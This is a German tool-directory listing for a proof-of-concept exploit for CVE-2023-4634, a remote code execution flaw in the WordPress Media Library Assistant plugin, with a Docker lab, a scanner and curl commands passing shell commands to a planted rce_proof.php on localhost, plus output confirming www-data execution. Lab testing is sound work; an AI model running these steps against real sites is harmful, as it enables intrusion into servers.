Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-4634-PoC — Proof-of-Concept-Exploit für CVE-2023-4634, eine Remote-Code-Ausführungsschwachstelle im WordPress Media Library Assistant Plugin. Enthält eine Docker-basierte angreifbare Umgebung und einen automatisierten Scanner. | Kitploit
Tools/GitHubGitHub/evillm/cve-2023-4634-poc
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubevillm/cve-2023-4634-poc

CVE-2023-4634-PoC

Proof-of-Concept-Exploit für CVE-2023-4634, eine Remote-Code-Ausführungsschwachstelle im WordPress Media Library Assistant Plugin. Enthält eine Docker-basierte angreifbare Umgebung und einen automatisierten Scanner.

Repository anzeigen
vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-4634 - RCE-Schwachstelle im WordPress-Plugin Media Library Assistant

1. Aufbau und Start der Umgebung

root@kitploit:~
cd Stand
docker-compose up --build -d

2. Warten auf den Start der Dienste (60 Sekunden)

root@kitploit:~
sleep 60
curl -I http://localhost:8080

3. Starten des Schwachstellenscans

root@kitploit:~
cd ../PoC/src
python3 scanner.py http://localhost:8080

4. Manuelles Testen der RCE

root@kitploit:~
# Тест команды id
curl "http://localhost:8080/rce_proof.php?cmd=id"

# Тест команды ping
curl "http://localhost:8080/rce_proof.php?cmd=ping+-c+2+127.0.0.1"

# Создание файла-доказательства
curl "http://localhost:8080/rce_proof.php?cmd=touch+/tmp/rce_proof"

✅ Erwartete Ergebnisse

Ausgabe von scanner.py:

root@kitploit:~
[*] Scanning: http://localhost:8080
[+] WordPress is accessible
[+] Plugin found: v3.09
[+] Plugin is VULNERABLE!
[*] Testing RCE...
[+] id command executed
[+] ping command executed
[+] file_check command executed
[+] RCE CONFIRMED!
[+] Results saved to ../result.txt

Inhalt von result.txt:

root@kitploit:~
{
  "cve": "CVE-2023-4634",
  "target": "http://localhost:8080",
  "timestamp": "2025-12-21 13:49:19",
  "vulnerable": true,
  "findings": {
    "wordpress": true,
    "plugin_vulnerable": true,
    "rce_id": true,
    "rce_id_output": "uid=33(www-data) gid=33(www-data) groups=33(www-data)",
    "rce_ping": true,
    "rce_file_check": true
  },
  "plugin_version": "3.09",
  "status": "VULNERABLE"
}

🔧 Technische Spezifikationen

Netzwerk:

  • WordPress: 172.20.0.2:80 (erreichbar unter localhost:8080)
  • Datenbank: 172.20.0.3:3306
  • Netzwerk: 172.20.0.0/24

Anforderungen:

  • CVE: CVE-2023-4634
  • Verwundbare Komponente: Plugin Media Library Assistant < 3.10
  • Schwachstellentyp: Remote Code Execution (RCE)
  • Systemanforderungen: Docker, Python 3.7+

📊 RCE-Nachweis

  • ✅ Ausführung des id-Befehls über HTTP
  • ✅ Ausführung des ping-Befehls über HTTP
  • ✅ Erstellung von Dateien in /tmp/
  • ✅ Bestätigung der Rechte von www-data
  • ✅ Ergebnisse dokumentiert in result.txt

🧹 Bereinigung

root@kitploit:~
cd Stand
docker-compose down -v
Tool herunterladen